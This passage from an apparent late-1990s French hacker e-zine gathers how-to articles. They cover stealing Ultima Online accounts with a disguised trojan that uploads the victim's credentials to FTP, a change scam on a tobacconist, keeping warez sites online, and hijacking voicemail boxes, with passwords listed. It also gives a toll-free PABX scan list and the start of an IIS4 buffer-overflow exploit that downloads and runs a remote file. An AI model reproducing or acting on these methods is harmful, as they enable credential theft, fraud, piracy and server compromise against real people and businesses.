"amis", qui vous filent leur UIN (numéro ICQ, très utilisé par les joueurs UO). Ou alors vous trouvez des sites web de joueurs UO puis vous trouvez son UIN sur sa page web. Ou encore vous demandez à votre pote qui joue à UO sa list de contacts ICQ. Ou sinon ben vous invoquez un démon qui va vous filer plein d'UIN de joueurs UO. - étape n°2 : Vous piquez le compte ICQ d'un pote puis vous envoyez un message à tous les joueurs UO du genre : "Installez tous le UO Security Add-On c'est très urgent !!!". Alors là ben tous ils reply : "c est quoi et on le trouve où ???" Et vous expliquez que y a un bug de securité dans UO et que ca le fix puis vous sendez un trojan renommé "UOSecure.exe" (Netbus, BO2 ou autre). - étape n°3 : Vous choppez l'adresse IP du gars qui a reçu le trojan puis vous vous y connectez, vous prenez son UO.CFG puis vous extractez son compte comme expliqué héhéhé !!! Bon cette technique n'est pas très pratique mais elle marche dans la plupart des cas. Vous pouvez aussi procéder par mail, ou sur l'irc (chan #uo et #uo2 mais les dcc sont interdits). Et puis, essayez toujours le classique NBTSTAT, ça marche assez souvent sur ce type de victime, qui ne se préoccupe pas trop de la sécurité de son pc en principe. Sinon, j'ai fait un petit trojan récupérateur de compte Ultima Online, tout automatisé, en Delphi 4. Un prog bien sympathique :o) qui peut encore être amélioré ! Il suffit que la victime l'éxécute pour que, si son UO.CFG contient le login/password de son compte, ca upload un fichier nommé [IP de la victime].txt dans n'importe quel répertoire de n'importe quel ftp (sur multimania par exemple). Il est aussi facile de faire un prog qui permet juste d'extracter un compte d'un UO.CFG ... Vous trouverez les sources commentées jointes à ce numéro de DeAtHlY-bY mAgAzInE. III) J'ai plein de comptes je sais pas quoi en faire moi ... Eh ben si vous savez pas quoi en faire, faut me les filer, je saurai moi :o) Sinon, soit vous jouez à UO et alors là, c'est le trip complet : à vous les magic armors, le gold à volonté, etc ... (je vous laisse imaginer ...), soir vous n'y jouez pas et alors vous pouvez toujours revendre les comptes UO, de 100 balles si il y a juste un perso moyen sur le compte, à 2500 balles à l'aise si il y a par exemple un Great Lord millionnaire avec un chateau, chef de guilde en plus !!! Je vous rappelle que c'est complètement illégal et que vous risquez gros, surtout si vous ne prenez aucunes précautions (pas de spoofing, la victime connait votre number ICQ, etc ...) et alors là vous vous ferez avoir à coup sûr. Eh bien vous en savez (presque !) autant que moi sur le hacking des comptes Ultima Online ! Vous pouvez me poser toutes les questions que vous voudrez sur ce sujet à flusher@rocketmail.com =============================================================================================== Hacker un bureau de tabac by ZoxP =============================================================================================== Because Hacking is LiKe SeX : when BeGiN, can't Stop !!! Matériel nécessaire : _ Un billet de 50 francs _ Un billet de 100 francs _ Un complice _ Une bonne paire de “ coronesses ” Tout le monde le sais : LES CLOPES C’EST TROP CHERE ! ! ! ! ! ! ! ! !, j’ai donc décidé d’écrire cet article afin que vous puissiez acheter vos cigarettes et vous faire de l’argent en même temps. Impossible me direz vous ? alors suivez attentivement la méthode a appliquer. Trouvez un tabac loin de chez vous et dans lequel vous n’irez qu’une seul fois. Votre complice rentre, commande un paquet de XXXX (pas de pub) et paye avec le billet de 100 francs. Vous êtes juste derrière et vous demandé un paquet de Marlboro (j’ai pas pus m’en empêcher, je suis actionnaire). Vous payé avec le billet de 50 francs. Vous laissé passé un client, puis vous faite mine de re compter la monnaie tout en vous dirigeant de nouveau vers la caissière : excusez moi, vous avez dût faire erreur, vous m’avez rendu la monnaie sur 50 francs. mais vous m’aviez donné un billet de 50 francs je suis désolé, mais je vous ai donné un billet de 100 francs, d’ailleurs je peux vous le prouvé, j’ai noté dessus la date de mon départ en vacances. Bien sûr votre complice aura noté une date sur le billet de 100 francs, et la caissière n’aura d’autre choix que de vous rendre la monnaie :) Les dialogues sont un peut simplistes, mais les grandes lignes sont tracées..., bonne chance. ZoxP : HACK THE PLANET =============================================================================================== Faire un site WaReZ .... qui se fait pas (enfin pas trop) effacer By Dark Angel =============================================================================================== Salut a tous, je vais vous expliquer ici comment faire un site dont le contenu est un peu illegal (hacking, cracking, warez ...) sans se faire effacer des le premier jour. 1) Les pages html : Deja ne pas les placer chez un hebergeur francais ! (la france pour la warez ca craint en ce moment ...). Choisir un autre pays, c'est mieux. Eviter aussi geocities, xoom et fortunecity car la ca ne fera pas deux jours, le mieux c'est encore tripod ou des petits hebergeur pas trop connus. N'appelez pas votre page index.html, index.htm ni warez.html, appz.html ... prendre un nom plus discret. 2) Les fichiers : Ne pas les placer la ou vous avez vos pages html ! Le meilleur a mon avis c'est geocities, 30 a 50k/s de debit, voire jusqu'a 100k/s. Utiliser winrar pour faire des volumes de 3M et les zipper ensuite. Au dela de 3 a 4M les fichiers ne sont pas acceptes, ni les .exe .rar .r** .ace .c00 ... Il ne faut pas que le nom du logiciel soit dans le nom du fichier. Pour cubase, appeler les fichiers cbase-1.zip, cbase-2.zip ... mais pas cubase-1.zip. Ils ont des robots qui scannent les noms des zip et effacent ceux qui contiennent le nom de logiciels couramment pirates. 3) Les mails : Pour faire ces pages web, il vous faut ensuite des adresses e-mail, la direct chez www.voila.fr, un mail est fait en 30 secondes, y'a pas plus rapide. 4) Cacher les fichiers : Bon evidement faut pas mettre les fichiers a la base de votre repertoire. Recuperer un page web perso bidon chez www.chez.com par exemple avec des images (dans l'explorer fichier, enregistrer sous) ca cree meme un repertoire \index_fichiers\ avec les images et un fichier html. Renommer cette page index.html et la placer dans votre espace web avec le repertoire \index_fichiers\ Creer un repertoire image ou wav ou pictures .... et y placer maintenant les pages html ou les fichiers, y mettre aussi le fichier index.html pour eviter le listing du repertoire. Refaire une page web bidon pour chaque page de stockage. 5) Creer des adresses de redirection : Vu que la duree de vie de cette page est courte, il faut des redirection pour que vos visiteurs puissent vous suivre. En creer ici : http://da.ru, http://findhere.com, http://hotpage.nu (la c'est en allemand, mais ca se fait quand meme a l'intuition) mais pas chez http://come.to ! ca tient pas. Envoyer chaque redirection sur une page principale differente, ca dimine le nombre de hits par page, ce qui permet d'etre plus discret. De meme en cas d'effacement tout n'est pas efface en meme temps. 6) Faire de la pub pour le site : NE PAS poster l'adresse reelle du site ni les redirections dans les newsgroups ou sur irc, sinon effacement garanti sous quelques jours. Aller chez http://come.to (oui c'est maintenant) et creer une adresse rien que pour ca qui sera effacee quelques temps apres, mais vos visiteurs auront vu vos adresses reelles sur le site, donc ils pourront revenir. Aller maintenant sur les channels warez sur irc et dans les newsgroups (2600, warez). Ne pas aller ailleurs ca attire des ennemis et donc d'eventuels effacements. Essayez aussi d'echanger des liens avec d'autres sites. 7) Maintenance : Quand une page principale est effacee, la refaire et changer l'adresse dans les redirection de meme pour les fichiers, la refaire et fixer les liens. 8) Petit dessin, c'est quelques fois plus clair qu'un grand discours : |geocities1\fichier1.zip site.da.ru --------- tripod1\page.html -----------\ |geocities1\fichier2.zip \ |geocities1\fichier3.zip site.findhere.com -- tripod2\page.html -------------------|geocities2\fichier4.zip / |geocities2\fichier5.zip site.hotpage.nu ---- tripod3\page.html -----------/ |geocities2\fichier6.zip | |geocities3\... come.to/kkchose (pour la pub) | |... Voila, c'est donc la demarche a suivre et surtout ce qu'il ne faut pas faire. Je ne garanti pas que ce sera de tout repos, mais pour moi ca marche. Et par pitie ne mettez pas de bannieres de pub pour gagner 100 f par mois et faire chier tout le monde! Pas de bannieres, juste du vrai WaReZ avec des liens qui marchent. @+ dans de nouvelles aventures ..... Dark =============================================================================================== 'Lu les skwatters de VMB ! By Jacker =============================================================================================== Vs me connaissez déja pr l'article sur la vmb au 0800 90 02 72. Pas mal d'entre vs m'ont laissé 1 msg me disant kils arrivaient pas à trouver 1 boite dc soit je m'exprime mal soit vous êtes pas doués. Bon, voici qqes explications en + : quand, après avoir taper "2" (Express Messaging), le nom ki est dit est "mail box four zero zero zero" (4000), le gars a pa personalisé son annonce et dc a ss dte pas changé son pass. Essaye alors le num de la boite comme pass (je rappelle qu'on accède à la meridian en tapant "1"). Si la meuf te dit "Your password has expired. To access your mailbox, press eight four.", c tt bon : ca veut dire ke le pass a expiré et kil fo en entrer 1 nouv en tapant 8 4. Là, suis les instructions (le "old password" st le num de la boite). Si après, t'arrives pa à trouver 1 boite, je ne plus rien faire. P'tit NB : les boites sont en 2xxx, 3xxx et 4xxx. Pour les 4000, essayez à partir de 4050 car les autres sont déjà squattés. Gros NB : kan tu envoie un msg et ke tu as ta boite fais : 75 + num boite + # + # + 5 + voix + # + 79 car on sait de ki ca vient et on pt répondre tt de suite. AVIS À CELUI QUI M'A DIT "C LA POLICE, c pa bien... bla bla bla", mail moi pr ce dt tu me parles. Au fait, je crois ke c légal de faire ça car j'ai trouvé aucun txt ki interdi d'appuyer sur les touches de son tél. Si qqun est au States, pt-il me mailer en privé pr saoir le num vert aux States (ils doivent en avoir 1). 'Lu à o-o-seven (désormais sur 7 vmb), Snike's, Kid (pa encore sur vmb), Lapin, Kennexpro (rencontré sur 7 vmb) et bien sûr Toi (big kisses if you read this and even if you don't). Jacker PS : Si tu vx outdialer, pa la peine de venir là ! =============================================================================================== LE PHENOMENE DE RODAGE By Cybz =============================================================================================== Tout d'abord, je riens a signaler que je suis en train d'ecrire cet article sous linux avec mon celeron 333 overclocke a 500 Mhz ! Et oui linux ca passe a 500 ! Mais windows....fuck ca passe pas... je dois me contenter d'un 416 ;) Mais comment ca se fait ? Avant, lorsque j'ai achete mon processeur et ma carte mere et que j'essayais de booter a 500 Mhz j'avais un ecran tout noir. J'etais oblige de rebooter 3 fois pour que le bios reprenne ses parametres par defaut ou meme defois je devais completement vider le CMOS ! Et grace a un phenomene, qui est le rodage, je peux maintenant aller sous linux a 500 Mhz, bientot peut etre 515 ! Revenons a l'origine du probleme.... Il y a des millions et des millions d'annees (ptetre pas tout ca je pense...) Intel a sortit ses premiers processeurs... qui ont bien evolue depuis. Et certaines personnes voulant le maximum de performances ont voulus pousser au maximum leur processeur, en augmentant le cycle de l'horloge... en anglais ca donne overclocking. Mais bon je vais pas m'attarder la dessus y'a deja eu un article dans CYBz 4 et les precedents deathlyby. Mais Intel est pas content, il n'aime pas que certains consommateurs fassent tourner des PII 300Mhz a 450 Mhz ! Il a donc trouve un moyen pour bloquer les coefficients multiplicateurs. Donc y'avais plus moyen d'overclocker... arf Ceci est le premier cas de figure : INTEL BLOQUE SES COEFF Aussi, lorsque l'on achete un PII 300 par exemple, donc "fait pour" tourner a 300Mhz, celui-ci n'est pas stable a des frequences superieures comme 450 Mhz. Ceci est le deuxieme cas de figure : PROCESSEUR PAS STABLE QUAND IL EST OVERCLOCKE. Et pourtant, apres certains mois d'utilisation intense de leurs PC, certains overclockers ont remarques qu'avec l'usage, leurs processeurs se "debloquaient" et pouvaient passer a des frequences superieures en etant plus stables ! Ils ont appeles ca un phenomene de rodage, qui est d'ailleur tres mysterieux... En effet, je traine sur un forum overclocking, j'ai vu plein de personnes qui ont tentes d'expliquer ce phenomene... mais sans plus ! LEs debats remontaient souvent sur : COMMENT INTEL BLOQUE SES COEFFICIENTS ? C'est malheuresement reste secret ! Si un kamikaze veut hacker le site d'intel pour debloquer son processeur et reveler a toute la planete (ou juste a moi ça me va ;) comment Intel bloque ses coeff qu'il se manifeste ! Ensuite, les gens parlaient souvent d'une migration d'electrons, qui est une action irreversible et qui bousillait le processeur. Je connais quelqu'un qui a deja vecu cela, mais sur une cinquantaines de pieces (pas des processeurs) dans une entreprise... TOUT A DU ETRE CHANGE ! Mais je n'ai jamais eu le temoignage de quelqu'un qui a casse son processeur a cause de ce phenomene, meme apres un an ou deux de surtension et de "surfrequence" du processeur... Voila en gros a chaque fois sur quoi menaient les debats... jamais d'explication concrete sur le rodage du processeur, ni sur comment intel bloque ses coeff, et ni sur "un processeur ca s'abime" Je ne vais donc pas tenter de vous expliquer comment ca se fait qu'un processeur se rode car ca risquerai fortement d'etre faux... Je vais vous dire comment roder un processeur ! Deja, beaucoup on remarques qu'en augmentant la tension, le processeur se rodait mieux, enfin plus vite ! Mais est-ce l'augmentation de la tension ou celle de la chaleur qui fait que le processeur se rode plus vite ? En tout cas, la premiere chose a faire est de monter la tension. La tension par defaut est 2.0 volt, moi j'ai mis a 2.5 v. Je ne vous conseille pas de depasser 2.5 ! Pour les masochistes... allez-y, mais pas a plus de 3v ! Apres ca devient completement hardcore ! SI vous etes masochiste bourres de fric, depassez pas 4v ! Si vous etes masochistes, bourres de fric, qui aimez recevoir du silicium fondu en pleine tete, pas plus de 10v ! Si vous voulez faire une farce pas tres mechante a un bon pote, branchez 2 pattes au choix du processeur sur le secteur 230 v ! Il va passer un bon moment ;) (conseil : courrez !) Deuxiemement, apres avoir augmente la tension, il faut lancer des applications pour que le processeur travaille ! Je vous conseille PRIME 95 qui calcule les nombres premiers (sur mon site http://cybz.virtualave.net dans la rubrique overclocking). Comment utiliser prime 95 pour roder : Lancer le programme, desactiver la connection au server pour les mises a jour de vos resultats. Ensuite, lancer le TORTURE TEST, et c'est partit !!! Petit conseil : copiez prime 95 dans plusieurs repertoires , lancez les tous en meme temps (pas plus de 4 si vous etes pas masochistes...) faites des torture test dans chacune des sessions... et faites tourner ca toute la nuit... Il y a aussi unreal en 1024x768 en software toute la nuit ou bien quake 2... Unreal est le meilleur jeu pour ca ! En supplement a un programme comme unreal ou prime 95 vous pouvez faire tourner votre cracker de pass prefere (john the ripper pour moi..) en brute force attack et ca bouffera encore plus de ressources sur le processeur... Ensuite, apres des jours et des jours de torture de votre processeur, vous pouvez monter un peu plus haut en frequence... gardez toujours une tension elevee... Au fur et a mesure, faites des test, et si c'est stable, descendez en tension jusqu'a arriver a la tension par defaut.. 2.0 v ! Enfin j'en connais qui ont reussi a faire tourner un celeron 300@504 Mhz en 1.9 v ! Mais biensur ils ont un super refroidissement (peletier...) Donc pour faire un test pour voir si votre CPU est stable, lancez prime 95 + plein de benchmark comme 3D mark 99 Max... et voyez si ca plante pas. Pour faire le test final pour voir si votre CPU est extremement stable, lancez unreal en software 1024x768 (ou plus...) toute une nuit, si le matin c'est plante, c'est que soit votre CPU est pas encore assez stable, ou soit que UNREAL est trop puissant ! C'est souvent que unreal est trop puissant ;) Pour ceux dont ca plante au demarrage de windows, ne vous inquietez pas, windows fait des test de la mort au demarrage... Il existe un utilitaire nomme SOFTFSB qui permet de changer la frequence de la carte mere sous windows c'est donc tres pratique ! Si vous arrivez a passer a des frequences superieures avec ca et bien vous pouvez segler softfsb pour qu'il se lance automatiquement au demarrage ! Il existe un autre probleme defois sur les CPU c'est que le cache L2 ne passe pas a des hautes frequences... il faut donc retirer ce cache L2 dans le bios... Mais par exemple si vous avez un celeron 333 qui marche tres bien a 416 avec le cache L2 et qui ne marche a 500 QUE quand vous retirez le cache L2 , autant rester a 416 Mhz... Une question que je me pose : LE CACHE L2 SE RODE-T-IL ? Pour ceux qui ont une BH6 et qui ont flashe le bios avec un nouveau bios (a partir de KG) , vous pouvez regler le CACHE L2 LATENCY. Par defaut c'est a 5. Si vous mettez vers 1, cela accelerera votre cache L2, sinon ca le ralentira... Donc avant de retirer le cache L2, essayez de la ralentir ! Petite astuce pour quand vous flashez votre bios. Deja je tiens a vous dire que j'ai flashe le mien six ou sept fois, et je n'ai toujours pas eu de problemes ! enfin je connais pas mal de personnes qui ont deja fouaré pas mal de flash... et cette technique leur a permis d'economiser une carte mere ! Alors, avant de flasher, placez les utilitaires de flash sur une disquette (avec une sauvegarde de votre ancien bios !) Creez sur cette disquette un autoexec.bat qui executera la commande de flash automatiquement. Comme ça si votre flash est rate, il vous suffit de rebooter sur la disquette automatiquement...et c'est sauve !
Voila... si vous tournez sous linux, pour roder votre CPU allez sous windows ! Rodez votre CPU... et meme s'il est pas stable sous windows, il le sera sous linux ! Et si vous etes sous windows et que vous desesperez car votre CPU ne passe pas a de hautes frequences sous windows, passez sous linux... Et pour ceux dont le processeur overclocke tourne tres bien sous windows, allez quand meme sous linux ça vous fera pas de mal ;) Si vous avez des questions, car j'ai pas pu tout aborder dans cet article, maillez moi a root@cybz.8m.com CYBz. =============================================================================================== Hack de VMB 0800 90 02 72 + no verts By kissi =============================================================================================== Salut les jeunes, Alors ds cet article on va causer de phreaking (vous l'aurez surement deviné !!!!) La gentille société ricaine proprio de la VMB nous laisse l'accès a pleins de boites vocales, héhé !!! Alors profitons-en (heim c pas bien ???) Petit rappel aux nouveaux et meme aux anciens : - accès aux VMB : taper 1 des le messg de l'autre meuf - pour laisser des messg : taper 2 toujours apres le messg de la meuf puis no_de_boite+# Dois-je rappeler les commandes ?? Ben non t'as ka lire le no 7 de deathly-by Vous voulez des boites pour délirer ??? en voila : ------------------------ | boites passwd | 4770 0504 | 4855 7519 | 4236 0504 | 4334 0504 | 4558 0504 ------------------------ En fait les pass ont été modifiés par moi et c pour ca qu'ils sont tous identiques Moi et mon frere on s'amuse bien sur la VMB c marrant pour les messages que les vieux ne doivent pas entendre ( meufs, bdo ... ) Donc pour des nouvelles boites, nous faire signe !!! Au fait voici une liste de no verts : ( ya de tout : modem, PABX, VMB, fax ... j'en passe et des meilleurs) Numéros verts francais : 0800 553 553 => modem 0800 007 575 => modem 0800 001 955 => modem 0800 661 661 => Addeco 0800 042 211 => Novell Sécurité anti-piratage (pabx) 0800 153 153 => Matrix Marketting (pabx) "chargé" 0800 123 321 => Esso (pabx) 0800 515 151 => AB National (pabx) "system audix" 0800 123 123 => Ecoterm (pabx) 0800 485 485 => "Personnes agées" (pabx) 0800 499 499 => Mutuelles Renault (pabx) 0800 161 161 => Covefi (pabx) 0800 001 616 => Assistance (pabx) 0800 029 029 => Confica Assistance (pabx) 0800 005 454 => Ventes de voitures (pabx) *=menu 6=menu2 5=menu3 #=acces aux VMB 0: 0800 065 065 => Cofidis (pabx) VMB:6178 pass:6178 "hacké le 3/6/99" (plus accessible) 0800 116 116 => Cétélem (pabx) 0800 222 426 => Cétélem bis (pabx) 0800 800 800 => Médiatis (pabx) 0800 005 858 => Société à Toulouse 0800 006 006 => (reroutage) Société DNX 0800 009 191 => FT (pabx)(c cho!!!) 0800 174 174 => FT 0800 007 007 => FT 0800 321 014 => FT 0800 001 919 => FT 0800 223 223 => FT (Mobicarte) 0800 848 848 => FT (super la zic) 0800 646 646 => "Xavier crédit aux particuliers" (mon ku) 0800 344 344 => société de telecoms 0800 366 366 => Direct Assurance 0800 773 773 => Omnicom (encore une super zic) 0800 777 777 => Cégétel "le 7" 0800 365 365 => Decavai? Assistance 0800 488 488 => "ne kittez pas ..." 0800 545 454 => La Redoute SAV 0800 654 456 => Cercle Médéric 0800 631 631 => Authentica Financement 0800 464 464 => Services Kerbox 0800 677 677 => Kerviac Assistance 0800 426 426 => Cégétel infos services pour SFR 0800 503 202 => Carte accord Auchan (idéal pour le SE) 0800 503 503 => Athéna Assurance 0800 550 550 => Kolt Telecommunication 0800 464 646 => Crédit mutuel de Bretagne 0800 575 575 => Dellit Assurance 0800 779 779 => Services La complémentaire Akéo-santé 0800 164 164 => Soft telecom (demande 1 no de kode) 0800 955 955 => no non autorisé 0800 954 954 => no non autorisé 0800 102 424 => chemineur ... 0800 494 949 => voix 0800 505 050 => demande un no de kode 0800 313 131 => Direct Assurance bis 0800 433 433 => Bureaux 0800 197 197 => Louge porte assurance 0800 187 187 => Abott France 0800 144 144 => GTA Livraison 0800 579 579 => Kinart 0800 183 183 => Services consommateur XXX 0800 009 595 => Tele-surveillance 0800 005 959 => voix 0800 001 919 => Asselcom 0800 009 090 => Action assistance 0800 055 055 => occupé 0800 077 077 => Assistance 0800 074 074 => La Poste 0800 002 002 => no de kode 0800 003 003 => occupé 0800 005 005 => musique 0800 595 595 => Société (pabx) max2.par2.ms.uu.net (0801631167) => Kro$oft Numéro verts internationaux : 0800 90 87 87 => modem 1 Web TV Network 0800 90 15 30 => modem 1 Etec System Inc. 0800 90 33 00 => modem 1 0800 90 51 51 => modem 1 0800 90 28 00 => modem 1 0800 90 69 96 => modem 1 0800 90 79 97 => modem 1 0800 90 22 22 => modem 1 0800 90 19 00 => modem 1 0800 90 68 86 => modem 1 0800 90 23 23 => modem 1 0800 90 03 03 => modem 1 0800 90 03 04 => modem 1 0800 90 42 42 => numéro anglais (pabx) compagnie ? 0800 90 42 40 => voix 0800 90 42 10 => répondeur pour fax (GB ou US) 0800 90 42 70 => demande un no de karte (GB) 0800 90 42 80 => telecom taugh-away (demande un no de karte) 0800 90 42 15 => repondeur (demande un autre no)(US) 0800 90 42 33 => no espagnol ? 0800 90 42 85 => pabx (US) "*0" ? " 0800 90 42 55 => pabx (US) ? 0800 90 45 45 => hum... bizzare (kom si on dékrochait) ??? 0800 90 74 74 => voix (US) (voix charmante !!!) 0800 90 74 21 => voix (US) 0800 90 65 44 => pabx (US) 0800 90 65 90 => telecom étranger (pabx) (US) 0=standard 1=no de bals 7627 7732 7626 7623 7639 7898 2991 7763 7641 7670 7643 7685 7680 7659 7618 7622 7501 7671 7728 7780 0800 90 71 22 => voix (pabx) 0800 90 71 44 => voix 0800 90 71 55 => No de bals (US) 0800 90 71 50 => demande des codes (US) 0800 90 77 00 => (fr/gb) pabx 0800 90 77 60 => (fr/gb) Bureaux (pabx) 0=system 7=no de bals 0800 90 87 15 => no de code 0800 90 88 55 => key-dd (no de code) 0800 90 92 31 => voix 0800 90 13 99 => telecom étranger 0800 90 11 11 => pabx 0800 90 11 45 => voix 0800 90 11 75 => voix (US) 0800 90 12 12 => pabx (US) #=no de bals 0800 90 12 23 => pabx } 0800 90 12 65 => pabx } Bureaux (US) 0800 90 13 13 => pabx } 0800 90 14 55 => voix 0800 90 15 15 => "pas à pas sans tabac" 0800 90 15 25 => Compagny Telecommunication Network (pabx) 0800 90 16 00 => No de bals (US) 0800 90 16 16 => No de bals (FR/US) 0800 90 16 32 => voix (US) 0800 90 16 66 => No de bals (US) 0800 90 17 17 => Service étranger (US) 0800 90 18 55 => Répondeur (US) 0800 90 19 90 => voix (terrible) 0800 90 20 02 => Répondeur (US) + voix 0800 90 21 00 => voix (FR) 0800 90 21 90 => T-net network 0800 90 21 55 => no de kode 0800 90 23 90 => pabx + voix (de meuf !!!) 0800 90 24 24 => pabx + voix 0800 90 25 00 => voix 0800 90 25 75 => voix 0800 90 26 26 => voix (US) 0800 90 26 55 => voix (US) 0800 90 27 00 => voix (US) 0800 90 30 00 => pabx + voix (FR) 0800 90 30 03 => Répondeur (FR) 0800 90 32 23 => pabx => SkyTel 1=10+1 mail-box, #=sortie, *=security code 0800 90 34 00 => voix (US) 0800 90 34 66 => no de bals (pabx) 0800 90 36 40 => pabx (zic des Beatles) 0800 90 37 73 => voix 0800 90 39 39 => no de bals + voix 0800 90 40 00 => voix (FR) 0800 90 40 40 => voix (DE) 0800 90 41 50 => voix (DE) 0800 90 43 00 => voix 0800 90 44 44 => no de kode 0800 90 45 45 => on peut appeler !!! 0800 90 46 46 => no de bals (j'y ai laissé un super message) 0800 90 50 55 => voix 0800 90 51 00 => no de bals 0800 90 52 52 => voix (FR) 0800 90 53 00 => pabx + voix (US) 0800 90 53 53 => voix (FR) 0800 90 55 00 => voix 0800 90 58 58 => voix (FR) 0800 90 59 00 => HP 0800 90 60 06 => voix 0800 90 63 36 => no de karte 0800 90 64 64 => Gateway (pabx) 0800 90 64 67 => pabx 0800 90 64 69 => pabx 0800 90 64 82 => ligne directe 0800 90 64 99 => Gateway bis (pabx) 0800 90 69 69 => Parlement européen 0800 90 75 62 => pabx chelou !!! 0800 90 77 77 => NO du Québec (voix) 0800 90 78 78 => sonnerie continue 0800 90 78 89 => lignes interrompues 0800 90 02 72 => belle VMB (ma préférée) Résultat d'un scan ya bien longtemps mais toujours valide Il n'est arrivé de tomber sur des trucs bizzares !! Des fréquences de 1500-2000 Hz (pas les modems) des trucs vraiment chelou, donc a vous de tester ... Pour me joindre : 0800 90 02 72 boite no 4525 ou e-mail : kissi1@caramail.com | kissi38@hotmail.com (j'suis pas svt sur le net) =============================================================================================== 'Lu ts les anti-FT ! By Jacker =============================================================================================== [NO DISCLAIMER 'cause it's legal and there's no risk of using it] Après le squatt de la vmb au 90 02 72, après les autres explic pr mx la squatter, voici maintenant 1 nouv produc de Jacker : "KOMENT FAIRE BANKER FT EN LEGAL ?!!" dans le rôle du bankeur : Agence France Telecom de celui ki fait banker : toi du moyen de faire banker : le phone (avec ou sans DTMF) Voici le scenario : Tu recherche "agence france telecom" sur le nitel et tu as : agence perso : 1014 ou 0800 1014 XX (XX = dpt) agence pro : 1016 ou 0800 1016 XX Dc, tu px appeler gratos votre agence par 2 moyens : le 1er, c votre agence locale ki répond ; le 2e, c 1 agence où tu vx ki répond. Et y'a tt bon : + elle est loin, + ca utilise d'autocoms, de lignes, et + ca leur coute et c 0,00 FF pr toi. Moi, kan g besoin d'un rensignement technik, je phone loin, très loin. Ex: appelle et demandez si Présentation du Numéro st compatible avec le std américain Caller ID car ton modem le fait et tu voudrais savoir si tu px lui faire reconnaitre le num. Ca marche pa (je me suis renseigné) ms ils mettent 1 tps fou à te répondre : tps = argent, tu vois le truc ! Kan ils te demandent si t'es de la ville en quest° tu di ke oui (fais le 3651 avant) et si ils disent ke t'appelle pas de la, tu leur dis ke t'es en vacances. Normalement, y'a pa pb ms fo pa phoner le 0800 1016 XX car ils st + rapides à répondre car c le service pro. Avec le 0800 1014 XX, t'as la zik d'attente qui bouffe du tps de connec. 1 tip : appelle plutot 1 petite agence car y'a - de stdistes et t'attend + lgtps. 'Lu à Toi (dt j'appelle l'agence FT d'où elle est kan elle st loin - big kisses, I miss you), Snike's (4582), Kid, o-o-seven (4563), Azrael (4999), Kennexpro (4008). _________________________________________________________ Jacker Boite vocale : 0800 900 272,,,2,4000# =============================================================================================== Exploit : Retina vs. IIS4 , round 2 By Dahlia =============================================================================================== 99-06-08 : eEye - Digital Security Team (eDST) a trouvé un ‘buffer OverFlow’ sur ISS4 , permettant aux utilisateurs distants (toi,eux,nous,vous,ils et moi) d’exécuter un code , pour le moins arbitraire ( :-]) sur les serveurs Web qui en sont équipé … Les statistiques voulaient qu’à l’époque , 90% de ces serveurs étaient vulnérables… Ce ne semble plus être le cas , mais ça continue de marcher sur certaines babasses . A VOS CLAVIERS ! ! Retina vs. IIS4 , round 2 affecte les systèmes suivants : NT 4.0 SP3 OptionPack 4 NT 4.0 SP4 OptionPack 4 NT 4.0 SP5 OptionPack 4 mmm… Comment ça marche ? Disons simplement qu’on va se faire un p’ti overflow sur au moins un des fichiers filtrés par défault sur les IIS ( .HTR,.ASP,.IDC) Il semblerait alors qu’IIS passe l’URL complète à la DLL associée à l’extension “ overflowée ” .Par conséquent , si la DLL ISAPI ne borne pas l’URL , on va se retrouver avec un magnifique overflow ,qui , et c’est là le comble , engloble l’ “ inetinfo.exe ” d’IIS à nous autorisant ainsi à exécuter le code de notre choix (Je pense que les idées malveillantes seront à bannir :-]) ) Vous pensez bien que les “ secure.Teams ” ont planché sur le code…. Voilà ce que ça donne : Ils ont d’abord donné à Retina une liste d’extensions communes à IIS et l’ont chargé(e) de trouver les éventuels trous de sécurité se rapportant à ces diverses extensions. Le résultat ne tarde pas à tomber : Il semble alors qu’on crashe le serveur en envoyant la commande “ GET /[owerflow].htr HTTP/1.0 ” C’est donc l’extension .HTR qui permet l’exploit (Lapalisse est un pote) ….mouaip … “ mais keske ça peut bien me foutre de savoir que je peux noyer un *.HDR … joli tout plein ton truc à je me casse ” “ NON ! Reste ! ” Ce que tu ne sais peut-être pas , c’est que IIS autorise les utilisateurs NT à changer leur mot de passe via le Net ( répertoire /iisadmpwd ) … et que cela se fait à l’aide de fichiers .HTR qui dépendent de la DLL ISAPI (ISM.DLL) Fô alors pas s’étonner que la-dite DLL ne borne pas une URL qui lui est passée à et hop … OverFlow ! Et quand on sait que le système .HTR/ISM.DLL est installé par défaut sur l’IIS4 .. on se dit que si c’est exploitable , … ça risque d’être fréquemment exploitable ! ! :-]) L’EXLOIT … L’EXPLOIT … L’EXLOIT ! ! ! … voilà le code source ….. puis utilisez le compilateur de votre choix.. ; IIS 4.0 remote overflow exploit. ; (c) dark spyrit -- barns@eeye.com ; ; greets & thanks to: neophyte/sacx/tree/everyone in #mulysa and ; #beavuh... and all the other kiwi's except ceo. ; ; credits to acp for the console stuff.. ; ; I don't want to go in too deeply on the process of exploiting buffer ; overflows... there's various papers out there on this subject, instead I'll ; give just a few specifics relating to this one.. ; ; Microsoft was rather good to us on this occasion, stuffing our eip value ; directly into a register then calling it.. no need to stuff valid addresses ; to make our way through various routines to eventually return to our ; address... but, unfortunately it wasn't all smooth sailing. ; Various bytes and byte sequences I was forced to avoid, as you'll quickly ; notice should you bother debugging this.. various push/pop pairs etc. ; I don't bother with any cleanup when all is done, NT's exception handling ; can cope with the mess :) ; ; The exploit works by redirecting the eip to the address of a loaded dll, ; in this case ISM.DLL. Why? ; Because its loaded in memory, is loaded at a high address which gets around ; the null byte problem.. and is static on all service packs. ; The code from ISM.DLL jumps to my code, which creates a jump table of ; of functions we'll need, including the socket functions.. we do this ; because unfortunately the dll's import tables don't include nearly enough ; of the functions we need.. ; ; The socket structure is created and filled at runtime, I had to do this ; at runtime because of the bad byte problem.. after this a small buffer is ; created, a get request issued to the web site of the file you want to ; download.. file is then received/saved to disk/and executed.. ; Simple huh? no not really :) ; ; Have fun with this one... feel free to drop me an email with any comments. ; ; And finally, heh.. "caveat emptor". ; ; ; you can grab the assembled exe at http://www.eEye.com. ; ; to assemble: ; ; tasm32 -ml iishack.asm ; tlink32 -Tpe -c -x iishack.obj ,,, import32 .386p locals jumps .model flat, stdcall extrn GetCommandLineA:PROC extrn GetStdHandle:PROC extrn WriteConsoleA:PROC extrn ExitProcess:PROC extrn WSAStartup:PROC extrn connect:PROC extrn send:PROC extrn recv:PROC extrn WSACleanup:PROC extrn gethostbyname:PROC extrn htons:PROC extrn socket:PROC extrn inet_addr:PROC extrn closesocket:PROC .data sploit_length equ 1157 sploit: db "GET /" db 041h, 041h, 041h, 